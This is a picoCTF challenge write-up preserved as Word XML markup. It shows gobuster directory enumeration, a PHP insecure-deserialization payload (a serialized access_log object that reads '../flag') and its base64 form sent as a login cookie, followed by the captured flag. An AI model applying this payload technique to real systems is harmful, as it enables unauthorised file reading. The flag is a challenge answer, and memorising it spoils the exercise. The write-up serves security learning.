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robots.txt we see admin.phps are not allowed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find three files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index.phps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cookie.phps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authentication.phps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we can use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gobuster dir -u [target ip] -w [wordlist] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for finding these pages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gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -u http://mercury.picoctf.net:2148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these files contains mutiple php function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is a deserialization vulnerability in these code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="55581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we can see we can send a serialised object of access_log class. As the object will not have the is_guest() function it will call die() in catch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will print $perm, the __toString method of our access_log object is called, which displays the content of whatever filename (the value of access_log) was passed to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will make a php object -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O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}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encode that to base64 and url encode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TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9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Finally we will make the authentication request with login cookie as this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="52184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picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_8db8f85c}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DFF1052"/>
    <w:rsid w:val="BAFD8599"/>
    <w:rsid w:val="DF7B1F84"/>
    <w:rsid w:val="DFEBA9DA"/>
    <w:rsid w:val="F7B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2023-09-24T05:12:01Z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